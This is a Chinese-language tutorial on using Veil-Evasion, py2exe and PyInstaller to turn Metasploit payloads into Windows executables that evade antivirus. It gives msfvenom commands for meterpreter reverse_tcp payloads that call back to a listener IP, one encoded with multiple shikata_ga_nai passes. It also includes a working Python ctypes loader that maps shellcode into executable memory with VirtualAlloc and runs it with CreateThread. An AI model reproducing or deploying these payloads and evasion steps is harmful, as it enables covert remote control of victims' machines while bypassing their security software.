Veil-Evasion
Veil-Evasion是一个用python写的流行的框架。我们可以用这个框架生成能够规避大多数杀软的载荷。Veil-Evasion被原生设计为在kali上,但其实存在python环境的系统上应该都能运行。
你可以用命令行轻松调用Veil-Evasion,按菜单选项生成payload。在创建payload的时候,Veil-Evasion会询问你是否想把payload文件用Pyinstaller或者Py2Exe转为可执行文件。
安装
kali linux可以直接
apt-get install veil-evasion
git克隆安装:
git clone http://github.com/Veil-Framework/Veil-Evasion.git
cd Veil-Evasion/setup
./install-addons.sh
在终端执行veil
进入安装配置。
payload列表
使用use、list可以列出当前可用的模块
Py2exe生成exe
生成shellcode
msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.137.44 lport=4444 -f raw -o shell.py
环境准备
(1)安装Python 2.7 x86 windows版:
https://www.python.org/ftp/python/2.7.16/python-2.7.16.msi
PS:必须使用x86版本Python 2.7。 即使Windows是x64的,也要安装32位版本。
(2)安装32位Py2exe for python 2.7:
https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/py2exe-0.6.9.win32-py2.7.exe/download
3) 生成exe
setup.py
setup.py 是利用Py2exe 将py转为exe
#! /usr/bin/env python
#encoding:utf-8
from distutils.core import setup
import py2exe
setup(
name = "shell",
description = "Python-based App",
version = "1.0",
console = ["shell.py"],
options = {"py2exe":{"bundle_files":1,"packages":"ctypes","includes":"base64,sys,socket,struct,time,code,platform,getpass,shutil",}},
zipfile = None
)
将shell.py和setup.py放在同一目录下,执行以下命令
python ./setup.py py2exe
将在dist目录下生成一个shell.exe
效果
PyInstaller生成exe
1) 生成shellcode
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.137.44 lport=4444 -e x86/shikata_ga_nai -i 11 -f py -o shell.py
2) 环境准备
安装pywin32:
https://sourceforge.net/projects/pywin32/files/pywin32
pyinstaller 下载解压,不用安装,即可使用:
https://github.com/pyinstaller/pyinstaller/releases
3) PyInstaller生成exe
#! /usr/bin/env python
#encoding:utf-8
import ctypes
def execute():
#Bind shell
shellcode = bytearray(
"\xdb\xc3\xba\x55\x91\x0e\xa3\xd9\x74\x24\xf4\x5d\x33"
"\xc9\xb1\x99\x31\x55\x1a\x03\x55\x1a\x83\xc5\x04\xe2"
"\xa0\x48\xe3\x18\xf0\xe1\xe1\x24\xdd\x82\x3d\x2d\x85"
.............省略...............
"\x2d\xba\x78\xc7\x22\x9a\x40\x74\x86\xb7\x39\x7b\x65"
"\xb1\x0a\x05\x3d\x58\x87\xbc\xf8\xb7\x41\x3d\x43\x9d"
"\xbc\xb6\x0e\x5d\x0d\xc1\x4f\x53\x03\x50\x2f\x7a\xd7"
"\x1e"
)
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
ctypes.c_int(len(shellcode)),
ctypes.c_int(0x3000),
ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr),
buf,
ctypes.c_int(len(shellcode)))
ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_int(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),
ctypes.c_int(-1))
if __name__ == "__main__":
execute()
生成exe
pyinstaller.py -F --console shellcode.py